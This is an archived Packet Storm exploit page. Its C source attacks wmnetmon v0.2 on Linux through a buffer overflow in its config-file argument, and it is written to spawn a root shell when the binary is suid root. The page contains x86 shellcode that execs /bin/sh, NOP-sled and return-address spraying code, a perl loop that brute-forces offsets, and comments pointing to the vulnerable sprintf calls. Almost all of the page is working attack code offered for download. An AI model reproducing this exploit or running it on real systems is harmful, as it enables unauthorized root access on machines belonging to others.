exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wmnetmon_bof.c

wmnetmon_bof.c
Posted Jun 19, 2000
Authored by vade79, realhalo

Wmnetmon v0.2 buffer overflow exploit for Linux - Provides a euid=0 shell provided /usr/X11R6/bin/wmnetmon is suid root, as it is by default. Includes perl script to try all offsets.

tags | exploit, overflow, shell, root, perl
systems | linux
SHA-256 | 86bef23e564b83a03659996407371bf9b0c8902fe578e15b80db3ca10affd2eb

wmnetmon_bof.c

Change Mirror Download
/* (linux+X11)wmnetmon[v0.2+] buffer overflow, by v9[v9@fakehalo.org].  this
will give you a euid=0 shell for the /usr/X11R6/bin/wmnetmon application.
/usr/X11R6/bin/wmnetmon is a monitor for X(a common windowmaker applet),
which is required to be SUID(=4755) root by install.

note: try offsets around -300. you will need to set your DISPLAY env var
correctly for this to evaluate locally(logged in). also, you will notice
wmnetmon say "file not found." when attempting to exploit it, it doesn't
overflow at that point, so don't think it's not vulnerable when it is. :)

test: this was tested on wmnetmon[v0.2p3] in linux. (v0.2+ will work)


this blatant overflow is caused by this(configfile.c):
char configfile[128];
...
sprintf(configfile,"%s",fname);

i also found this while looking at the source, but there is no need to make
two exploits that do the same thing:
char configfile[128];
...
char *homedir=getenv("HOME");
...
sprintf(configfile,"%s/.wmnetmonrc",homedir);


here is the traditional perl script to run offsets (until ctrl-c):

#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("./wmnetmon_bof $i");
$i+=10; # match the value with the number of no operations if you want.
} */

#define PATH "/usr/X11R6/bin/wmnetmon" // maybe the admin installed elsewhere?
#define DEFAULT_OFFSET -300 // just to make it easy for you. (g)
static char exec[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // i like hex01.
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[142]; // not exact, but who's counting?
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
for(i=0;i<136;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(132-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
printf("[ return address: 0x%lx(offset=%d), total size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
if(execlp(PATH,"wmnetmon","-c",bof,0)){
printf("%s: execution failed, maybe %s doesn't exist?\n",argv[0],PATH);
exit(-1);
}
}
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close